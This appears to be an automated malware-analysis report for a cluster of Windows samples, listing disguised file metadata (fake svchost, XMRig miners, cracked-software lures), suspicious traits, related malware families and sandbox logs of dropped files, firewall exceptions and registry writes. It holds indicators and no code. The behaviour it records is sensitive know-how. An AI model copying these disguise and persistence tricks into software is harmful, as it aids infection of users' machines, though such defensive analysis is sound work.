File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
File is either console or GUI application
File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
File is Native application (NOT .NET application)
File is not packed
IMAGE_FILE_DLL is not set inside PE header (Executable)
IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name	Value
Assembly Version	6.2.19041.6033 1.0.0.1 1.0.0.0 0.8.1.0 0.0.0.0
Comments	2 Adds Upgrades to be bought via the Terminal Flavor=Retail Shell Infrastructure Host This installation was built with Inno Setup. This is a shim that points to a particular file. It was generated by ShimGen (Shim Generator). The use of shimgen must comply with its proprietary license.
Company Name	3 Common Softwares Computta.com Cowan Innovations Inc. EnhancedEnterprises Gunther-Gerben Boxhammer Microsoft Corporation Native System Provider Omniscye RealDimensions Software, LLC Show More sharkbot The Monero Developer Community www.hola..com www.microsoft.com www.truemining.online www.xmrig.com
File Description	.NET Runtime Optimization Service 1 Altruistics Uninstaller Antimalware Core Service Computta CPVisual EmpressMinecraft EnhancedEnterprises Gunther-Gerben Boxhammer Launcher Hola Update Show More Host Process for Windows Services icl Internet Explorer KPGminer Microsoft Windows Networking Sevrices OOBE Network Connection Flow Runtime Broker Setup/Uninstall sharkbot Shell Infrastructure Host ShimGen generated shim - shim svchost.exe This installer database contains the logic and data required to install NativeServicesProvider. Windows Desktop Manager winrar-x64-591 Installer XMRig miner XMRig ZeroFee by True Mining
File Version	51.1052.0.0 10.0.26100.7019 (WinBuild.160101.0800) 10.0.26100.5074 (WinBuild.160101.0800) 10.0.19041.5198 10.0.19041.746 6.31.6.0 6.26.0 6.25.0 6.22.2-zerofee 6.22.2 Show More 6.21.1 6.2.19041.6033 4.18.25100.9008 (b0af8b174efae63a7a64d96131727074dad31379) 4.8.9065.0 built by: NET481REL1LAST_C 2.5.2 2.1.0 2, 0, 0, 0 2 1.30 1.6.0.1 1.0.1 1.0.0.1 1.0.0.0 0.89 0.8.1.0 0.0.0.0
Internal Name	Altruistics Uninstaller Assembly-CSharp.dll Computta CPVisual.exe DriverVideo.exe EmpressMinecraft.dll EnhancedEnterprises.dll ethminer.exe free hydra.exe Game Launcher Show More Guim.exe HdcksMen.exe hydra free.exe icl.exe KPGminer.exe max-watchdog.exe MpDefenderCoreService.exe mscorsvc.exe NativeServicesProvider okay.exe Pegasus icarus Hvnc.exe RuntimeBroker.exe sharkbot.dll svchost.exe twitchbot.exe updater-checker.exe Updater.exe ValoLoader.exe winrar-x64-591 XENO EMULATOR BYPASS.exe
Legal Copyright	5 Computta.com Copyright (C) 2016-2023 microsoft.com Copyright (C) 2016-2024 Copyright (C) 2016-2024 xmrig.com Copyright (C) 2016-2024 xmrig.com \| Copyright (C) 2021-2025 True Mining Copyright (C) 2016-2025 hola..com Copyright (C) 2016-2025 Networking Sevrices Copyright (C) 2016-2025 xmrig.com Copyright (C) 2016-2026 xmrig.com Show More Copyright (C) 2018 Native System Provider Copyright (C) 2018- Gunther-Gerben Boxhammer Copyright (C) 2021 Common Softwares Copyright (C) Microsoft Corporation. Copyright (C) Microsoft Corporation. All rights reserved. Copyright © 2013 - 2017 RealDimensions Software, LLC Copyright © 2018 Copyright © 2022 Cowan Innovations Inc. © 2022 © Microsoft Corporation. All rights reserved. © Microsoft Corporation. All rights reserved. © Microsoft Corporation. All Rights Reserved.
Legal Trademarks	6
Original File Name	NativeServicesProvider.exe winrar-x64-591.exe
Original Filename	Altruistics Uninstaller Assembly-CSharp.dll CPVisual.exe DriverVideo.exe EmpressMinecraft.dll EnhancedEnterprises.dll ethminer.exe free hydra.exe GGBH.exe Guim.exe Show More HdcksMen.exe hola..exe hydra free.exe icl.exe KPGminer.exe max-watchdog.exe MpDefenderCoreService.exe mscorsvc.exe msedgeview3.exe okay.exe Pegasus icarus Hvnc.exe RuntimeBroker.exe sharkbot.dll svchost.exe twitchbot.exe uninstall.exe updater-checker.exe Updater.exe ValoLoader.exe Windows Networking Sevrices.exe WMD.EXE wmsearch.exe XENO EMULATOR BYPASS.exe xmrig.exe
Private Build	DDBLD356B
Product Name	4 Altruistics Computta Деинсталлятор CPVisual EmpressMinecraft EnhancedEnterprises Explorer GGBH Launcher Hola icl Show More KPGminer Microsoft® .NET Framework Microsoft® Windows® Operating System Monero GUI Wallet NativeServicesProvider sharkbot ShimGen generated shim svchost.exe Windows Networking Sevrices winhttp winrar-x64-591 WMD wmsearch XMRig XMRig Zerofee
Product Version	10.0.26100.7019 10.0.26100.5074 10.0.19041.746 10.0.18041 6.31.6.0 6.26.0 6.25.0 6.22.2-zerofee 6.22.2 6.21.1 Show More 6.2.19041.6033 4.18.25100.9008 4.8.9065.0 2.5.2 2.1.0 2, 0, 0, 0 2 1.30 1.6.0.1 1.0.1 1.0.0.1 1.0.0.0 1.0.0+8df7888a094264c71862434302af4d2ea413a747 1.0.0+8d0131e98690c8e8725040a073b49b40f14c4711 1.0.0 0.89 0.18.4.5 0.18.4.4 0.18.4.3 0.18.4.2 0.8.1 0.0.0.0

Digital Signatures

Signer	Root	Status
16QP LIMITED	COMODO RSA Code Signing CA	Self Signed
Jetstar Media LTD	COMODO RSA Code Signing CA	Self Signed
Contagious Computing Complex	Contagious Computing Complex	Self Signed
www.freesharesoft.com	www.freesharesoft.com	Self Signed

File Traits

.NET
2+ executable sections
big overlay
dll
fptable
GetConsoleWindow
golang
HighEntropy
Inno
InnoSetup Installer

Installer Manifest
Installer Version
NewLateBinding
No Version Info
ntdll
packed
RAR (In Overlay)
RijndaelManaged
Run
VirtualQueryEx
WRARSFX
WriteProcessMemory
x64
x86

Block Information

Total Blocks:	17,230
Potentially Malicious Blocks:	653
Whitelisted Blocks:	13,947
Unknown Blocks:	2,630

Visual Map

0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 ? 0 0 ? 0 0 ? ? 0 0 ? 0 0 0 0 ? 0 0 ? 0 0 0 ? 0 ? ? 0 ? 0 0 ? 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 ? 0 0 1 0 0 0 0 0 0 0 ? 0 ? ? 0 ? 0 0 ? 0 0 0 0 0 0 0 ? 0 0 ? 0 ? 0 ? 0 0 0 0 0 0 0 0 0 ? ? ? ? 0 ? 0 ? 0 ? ? ? x ? ? ? x ? ? 0 ? ? ? 0 x ? ? 0 0 0 0 0 ? x ? ? 0 x ? ? 0 0 0 0 ? 0 0 0 0 0 ? 0 ? ? ? 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 ? 0 0 ? 0 0 0 0 0 0 0 0 0 ? ? ? ? 0 0 0 0 ? 0 0 0 0 ? ? ? 0 x 0 0 0 ? 0 0 ? ? x 0 0 0 0 0 ? ? x 0 0 ? x ? ? x ? ? 0 0 ? 0 0 0 ? 0 0 x ? ? ? ? ? ? 1 x ? 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 ? x 0 0 0 0 ? 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 1 0 0 0 0 0 0 0 0 0 ? 0 1 0 ? 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? ? ? ? ? ? ? ? x 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 ? ? ? ? ? ? ? 0 0 0 ? ? ? ? ? 0 0 0 0 1 0 0 x ? ? 0 0 0 0 0 0 0 0 0 0 x 0 0 0 ? 0 0 0 0 0 ? 0 0 0 0 ? 0 0 0 0 0 0 1 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 ? x ? ? x ? 1 0 0 ? 0 0 0 ? 0 0 0 0 0 0 0 0 0 ? x x 0 0 0 0 0 0 0 x 0 x x x ? 0 0 x x 0 x 0 0 0 ? ? ? ? ? 0 ? x 0 ? ? 0 0 0 ? ? ? 0 x ? ? ? ? ? x 0 ? 0 0 0 ? ? 0 ? ? 0 0 0 0 ? ? ? ? ? ? ? ? ? 0 0 x 0 ? x x 0 0 ? 0 ? ? ? 0 ? 0 ? x 0 ? ? 0 0 ? ? ? 0 ? ? ? ? ? ? ? ? ? ? ? 0 0 0 0 0 0 0 ? 0 ? ? 0 0 0 0 1 0 ? 0 0 1 ? 0 0 0 0 0 0 1 ? 0 ? ? 0 0 0 0 ? 0 0 0 0 ? ? ? ? ? ? ? 0 ? 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x ? ? ? 0 x 0 0 ? ? 0 0 ? ? ? 0 0 0 0 0 0 0 0 ? x x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 ? 0 ? x x ? ? 0 ? ? 0 x ? ? 0 ? ? ? ? ? ? 0 ? 0 ? ? x ? ? 0 ? x ? ? 0 ? x ? 0 ? ? ? ? 1 x 0 0 0 0 0 0 0 0 ? 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 x x ? ? ? ? ? ? ? x ? 0 0 0 0 0 0 0 0 ? 0 ? ? x ? 0 0 0 x ? ? ? ? x x 0 ? ? ? 0 ? ? 0 ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 ? ? ? x 0 0 0 0 x ? ? ? ? ? 0 0 0 0 0 0 ? 0 ? ? ? ? ? 0 0 0 0 1 0 0 0 0 ? 0 0 ? 0 0 0 0 0 0 0 0 0 ? ? 0 0 1 0 x x ? x 0 ? 0 0 x 0 ? 0 ? ? 0 0 0 ? x 0 0 x x 0 ? ? 0 ? 0 0 0 x x x 0 ? ? x ? ? 0 ? ? 0 0 x 0 0 ? 0 0 0 0 x x 0 ? ? 0 0 0 0 0 0 0 0 0 0 x 1 ? ? ? 0 ? 0 0 0 0 x 0 0 0 0 0 ? 0 0 0 0 0 x 0 ? 0 x 0 ? x x x x x ? ? ? 0 0 0 ? ? ? 0 x 0 0 ? 0 0 x x ? ? ? ? 0 ? ? 0 ? x 0 ? 0 ? 0 ? ? 0 0 0 x ? ? 0 ? ? ? 0 ? ? 0 0 0 0 0 0 0 0 ? ? ? 0 0 0 ? ? 0 ? ? ? x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 ? x x ? x ? ? 0 ? ? ? ? ? ? x ? ? ? ? x 0 0 x ? ? ? ? 0 0 0 0 1 0 0 ? ? ? x ? ? 0 ? ? 0 0 0 0 ? ? ? 0 ? ? 0 ? ? ? ? ? 0 ? ? ? 0 ? ? 0 ? ? ? ? 0 0 ? 0 ? 0 0 0 ? ? ? ? 0 ? ? 0 ? 0 ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x ? 0 0 0 0 0 0 0 x 0 0 0 0 0 0 ? 0 x 0 0 x ? ? 0 ? ? ? ? 0 ? 0 ? 0 0 0 ? x x x 0 0 ? x x 1 ? ? ? ? 0 ? ? 0 0 0 ? 0 x 0 ? ? 0 0 0 0 0 0 ? ? 0 0 ? 0 x x x ? ? 0 ? 0 x x 0 1 x 0 0 x 0 0 0 ? 0 0 0 ? 0 x x ? 1 0 0 x ? 0 ? ? ? ? ? x 0 ? ? 0 ? 0 0 0 0 1 ? 0 0 0 x ? 0 0 ? ? x 0 0 ? ? 0 0 ? x 0 0 ? ? 0 ? ? ? x ? x 0 ? ? ? x ? ? ? ? ? 1 x 0 x ? ? ? ? ? 1 ? ? 0 0 ? ? 0 ? 0 0 ? 0 0 0 x x 0 0 ? x 0 0 ? ? ? x ? ? ? ? ? ? x 0 0 ? ? ? ? 0 0 ? ? ? ? ? ? ? ? ? ? ? 0 x x x ? ? ? ? 0 0 0 ? 0 0 0 0 0 0 1 0 0 ? x 0 ? 0 0 0 0 0 ? 0 x x ? ? 0 x 0 ? ? ? 0 ? 0 x x ? ? 0 x 0 ? ? 0 x x ? ? 0 x 0 ? 0 ? 0 0 0 x ? x ? 0 x 0 0 ? 0 ? ? 0 0 0 0 0 ? ? 0 0 0 0 x 0 0 0 0 1 0 0 0 ? 0 ? ? 0 ? ? ? ? ? 0 0 0 0 0 0 0 ? 0 0 ? ? ? ? 0 0 0 0 x 0 0 x 0 ? x ? ? ? ? ? ? ? ? ? 0 ? ? 0 0 0 ? ? ? 0 ? ? ? ? 0 0 0 0 0 1 0 0 x ? ? ? ? ? ? ? x ? ? ? ? ? 0 ? 0 ? x ? 0 0 1 ? 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 ? ? 0 0 0 0 0 ? ? ? ? ? ? 0 0 0 1 0 ? ? x ? ? ? 0 0 ? ? ? ? ? ? ? ? x ? 0 ? 0 ? ? ? 1 ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? x ? 0 ? ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? x ? 0 ? ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? x ? 0 ? ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? x ? 0 ? ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? ? ? ? ? ? 0 ? ? 0 ? 0 ? 0 ? 0 ? 0 0 0 ? ? ? 0 ? ? ? ? ? ? ? ? ? 0 ? 0 ? 0 ? ? 0 ? ? 0 0 0 0 0 0 ? x ? ? ? 0 0 1 0 0 1 ? 0 ? 0 ? ? ? ? ? ?

... Data truncated

0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

Agent.FDD
Agent.GOG
Agent.LPAA
Agent.LPQ
Agent.TKM

BadIIS.GA
Bitcoinminer.CBA
Bitcoinminer.E
Bitcoinminer.H
Bitcoinminer.KC
Bitcoinminer.L
Bitcoinminer.LC
BypassUAC.HA
ClipBanker.HJA
ClipBanker.IF
Coinminer.AHC
Coinminer.GCJ
Coinminer.RB
DiscordStealer.DB
Downloader.GDG
Downloader.GDH
Dropper.Agent.GD
Gamehack.EBF
Gamehack.GSI
Injector.AK
Injector.DRC
Injector.DRD
Keylogger.GDC
Keylogger.RA
Kryptik.XXBA
Kryptik.XXBF
Lumma.GFD
MSIL.Agent.KAB
MSIL.Agent.XO
MSIL.AgentTesla.AH
MSIL.Cerbu.C
MSIL.Coinminer.XA
MSIL.Dropper.X
MSIL.Dropper.XF
MSIL.Heracles.IO
MSIL.Inject.AAI
MSIL.Inject.AB
MSIL.Inject.YT
MSIL.Injector.XT
MSIL.Krypt.GEBU
MSIL.Krypt.SEA
MSIL.Krypt.U
MSIL.Krypt.YAGO
MSIL.Krypt.YAGR
MSIL.Krypt.YAGT
MSIL.Kryptik.XC
MSIL.Kryptik.XE
MSIL.Spy.Agent.XF
MSIL.Spy.Agent.XG
Pinggy.A
Rugmi.IA
ShellcodeRunner.YD
Sheloader.A
Sheloader.C
Stealer.IFA
Stealer.KF
SteamStealer.C
Trickbot.AJ
Trojan.Agent.Gen.BL
Trojan.Agent.Gen.FN
Trojan.Agent.Gen.NA
Trojan.ReverseShell.Gen.AW
Trojan.ShellcodeRunner.Gen.KC
Wdfload.A

Files Modified

File	Attributes
\device\namedpipe	Generic Read,Write Attributes
\device\namedpipe	Generic Write,Read Attributes
\device\namedpipe\dav rpc service	Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\gmdasllogger	Generic Write,Read Attributes
\device\namedpipe\pshost.133976748101365294.6008.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134125939623293346.7060.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134180993952178115.516.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\toserveradvinst_estimate_c:\users\user\downloads\5597c10b0b2d85c5f193a989fa677823773a4eb0_0004143472	Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\toserveradvinst_estimate_c:\users\user\downloads\d27e9946413b7aa4dd819f1f82e020a26f4db980_0002316240	Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\toserveradvinst_extract_c:\users\user\downloads\5597c10b0b2d85c5f193a989fa677823773a4eb0_0004143472	Generic Read,Write Data,Write Attributes,Write extended,Append data

\device\namedpipe\toserveradvinst_extract_c:\users\user\downloads\b148e3b44ef9d1239622ce4041f467dacf2aec9c_0003532648	Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\toserveradvinst_extract_c:\users\user\downloads\d27e9946413b7aa4dd819f1f82e020a26f4db980_0002316240	Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\wkssvc	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\program files\hola\app\holamonitorservice.exe	Generic Write,Read Attributes
c:\programdata\free hydra.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_2qfuc11v.n40.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_cs0icwc3.bdn.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_hi4hjy5y.tju.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_kise41dq.atn.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_kiwtn0sh.3nf.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_n3lf2rfk.g0m.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\aieadaf.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\aieadaf.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\local\temp\aieadaf.tmp	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\build.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\exeb93a.bat	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\exeb93a.bat	Synchronize,Write Data
c:\users\user\appdata\local\temp\h6q_mxj7.0.cs	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\h6q_mxj7.cmdline	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\h6q_mxj7.dll	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\h6q_mxj7.err	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\h6q_mxj7.out	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\h6q_mxj7.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\jusched.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\temp_script.bat	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\~df01a2810d2fc46141.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\content\5080dc7a65db6a5960ecd874088f3328_bc00434159dae8351451cce9c748f5d7	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\content\cc42971b7939a9ca55c44cfc893d7c1d	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\content\d2b5168cdd0ebf4c0c8ea1c3a1fae07f_0fc53b6d791a7d4e33083edc3ed14e9a	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\content\d2b5168cdd0ebf4c0c8ea1c3a1fae07f_2f10f6ac1b30a30cd4f31e26cb4e9b13	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\metadata\5080dc7a65db6a5960ecd874088f3328_bc00434159dae8351451cce9c748f5d7	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\metadata\cc42971b7939a9ca55c44cfc893d7c1d	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\metadata\d2b5168cdd0ebf4c0c8ea1c3a1fae07f_0fc53b6d791a7d4e33083edc3ed14e9a	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\locallow\microsoft\cryptneturlcache\metadata\d2b5168cdd0ebf4c0c8ea1c3a1fae07f_2f10f6ac1b30a30cd4f31e26cb4e9b13	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\common softwares\1.30\1033.dll	Generic Write,Read Attributes
c:\users\user\appdata\roaming\common softwares\1.30\decoder.dll	Generic Write,Read Attributes
c:\users\user\appdata\roaming\common softwares\1.30\dfd0a61\winrar-x64-591.msi	Generic Write,Read Attributes
c:\users\user\appdata\roaming\hackers.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\hydra free.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\miners\logs\client_20260313_041004.log	Generic Write,Read Attributes
c:\users\user\appdata\roaming\miners\logs\client_20260326_230507.log	Generic Write,Read Attributes
c:\users\user\appdata\roaming\native system provider\nativeservicesprovider 1.0.1\install\5713427\native services provider.msi	Generic Write,Read Attributes
c:\users\user\appdata\roaming\native system provider\nativeservicesprovider 1.0.1\install\decoder.dll	Generic Write,Read Attributes
c:\users\user\appdata\roaming\systema natives\mservices x 2.1.0\install\6e7ac47\mservice x.msi	Generic Write,Read Attributes
c:\users\user\appdata\roaming\systema natives\mservices x 2.1.0\install\decoder.dll	Generic Write,Read Attributes
c:\users\user\appdata\roaming\systema natives\mservices x 2.1.0\install\holder0.aiph	Generic Write,Read Attributes
c:\users\user\appdata\roaming\twitch.exe	Generic Write,Read Attributes
c:\users\user\downloads\c:\programdata	Synchronize,Write Attributes
c:\windows\__tmp_rar_sfx_access_check_1284734	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\windows\appcompat\programs\amcache.hve	Read Data,Read Control,Write Data
c:\windows\appcompat\programs\amcache.hve	Write Attributes
c:\windows\kmspico_setup.exe	Generic Write,Read Attributes
c:\windows\kmspico_setup.exe	Synchronize,Write Attributes
c:\windows\system32.vbs	Generic Write,Read Attributes
c:\windows\system32.vbs	Synchronize,Write Attributes
c:\windows\window.exe	Generic Write,Read Attributes
c:\windows\window.exe	Synchronize,Write Attributes
c:\windows\windows.bat	Generic Write,Read Attributes
c:\windows\windows.bat	Synchronize,Write Attributes
c:\windows\windows.vbs	Generic Write,Read Attributes
c:\windows\windows.vbs	Synchronize,Write Attributes

Registry Modifications

Key::Value	Data	API Name
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\2bee30dc7a2cd28cc0137a80eecbe8e9fc77745e_0000042016	c:\users\user\downloads\2bee30dc7a2cd28cc0137a80eecbe8e9fc77745e_0000042016:*:Enabled:ipsec	RegNtPreCreateKey
HKCU\software\acoirphv::w1_0	윣렴	RegNtPreCreateKey
HKCU\software\acoirphv::w2_0	♄	RegNtPreCreateKey
HKCU\software\acoirphv::w3_0	ꢀĒ	RegNtPreCreateKey
HKCU\software\acoirphv::w4_0	d	RegNtPreCreateKey
HKCU\software\acoirphv::w1_1	鑴ᢈ	RegNtPreCreateKey
HKCU\software\acoirphv::w2_1	䀓潫	RegNtPreCreateKey
HKCU\software\acoirphv::w3_1	컗湹	RegNtPreCreateKey
HKCU\software\acoirphv::w4_1	昳潫	RegNtPreCreateKey
HKCU\software\acoirphv::w1_2	鎌ᘵ	RegNtPreCreateKey

HKCU\software\acoirphv::w2_2		RegNtPreCreateKey
HKCU\software\acoirphv::w3_2		RegNtPreCreateKey
HKCU\software\acoirphv::w4_2		RegNtPreCreateKey
HKCU\software\acoirphv::w1_3	搧ੌ	RegNtPreCreateKey
HKCU\software\acoirphv::w2_3	ᕁ乂	RegNtPreCreateKey
HKCU\software\acoirphv::w3_3	鮅佐	RegNtPreCreateKey
HKCU\software\acoirphv::w4_3	㍡乂	RegNtPreCreateKey
HKCU\software\acoirphv::w1_4		RegNtPreCreateKey
HKCU\software\acoirphv::w2_4	膋붭	RegNtPreCreateKey
HKCU\software\acoirphv::w3_4	㇜벿	RegNtPreCreateKey
HKCU\software\acoirphv::w4_4	餸붭	RegNtPreCreateKey
HKCU\software\acoirphv::w1_5	䐓㦱	RegNtPreCreateKey
HKCU\software\acoirphv::w2_5		RegNtPreCreateKey
HKCU\software\acoirphv::w3_5	圳Ⰺ	RegNtPreCreateKey
HKCU\software\acoirphv::w4_5	ￗⴘ	RegNtPreCreateKey
HKCU\software\acoirphv::w1_6	ꍢ湍	RegNtPreCreateKey
HKCU\software\acoirphv::w2_6	䁎鲄	RegNtPreCreateKey
HKCU\software\acoirphv::w3_6	캊鶖	RegNtPreCreateKey
HKCU\software\acoirphv::w4_6	普鲄	RegNtPreCreateKey
HKCU\software\acoirphv::w1_7	峟觾	RegNtPreCreateKey
HKCU\software\acoirphv::w2_7	퀚௯	RegNtPreCreateKey
HKCU\software\acoirphv::w3_7	擡૽	RegNtPreCreateKey
HKCU\software\acoirphv::w4_7	찅௯	RegNtPreCreateKey
HKCU\software\acoirphv::w1_8	鶹醪	RegNtPreCreateKey
HKCU\software\acoirphv::w2_8	Ɱ筛	RegNtPreCreateKey
HKCU\software\acoirphv::w3_8	騸穉	RegNtPreCreateKey
HKCU\software\acoirphv::w4_8	㋜筛	RegNtPreCreateKey
HKCU\software\winrar sfx::c:\programdata	%ProgramData%	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_0	윣렴	RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_0	♄	RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_0	ꢀĒ	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_0	d	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_1	遢ྂ	RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_1	䐅硡	RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list::c:\users\user\downloads\600276347abed96a481884d2b16907fe429efc61_0000045841	c:\users\user\downloads\600276347abed96a481884d2b16907fe429efc61_0000045841:*:Enabled:ipsec	RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_1	쫁祳	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_1	戥硡	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_2	鮠㠡	RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_2		RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_2	氂	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_2	쓦	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_3	燡⴪	RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_3	椤	RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_3	蹃栶	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_3	⚧椤	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_4	ﵾ꿂	RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_4	釓	RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_4	ↄ	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_4	襠	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_5	僥䵏	RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_5	쾊姦	RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_5	䏅壴	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_5	姦	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_6	裮₁	RegNtPreCreateKey
HKCU\software\axtkjpwe::a2_6	毂퉈	RegNtPreCreateKey
HKCU\software\axtkjpwe::a3_6	퍚	RegNtPreCreateKey
HKCU\software\axtkjpwe::a4_6	䷢퉈	RegNtPreCreateKey
HKCU\software\axtkjpwe::a1_7	㽹좸	RegNtPreCreateKey
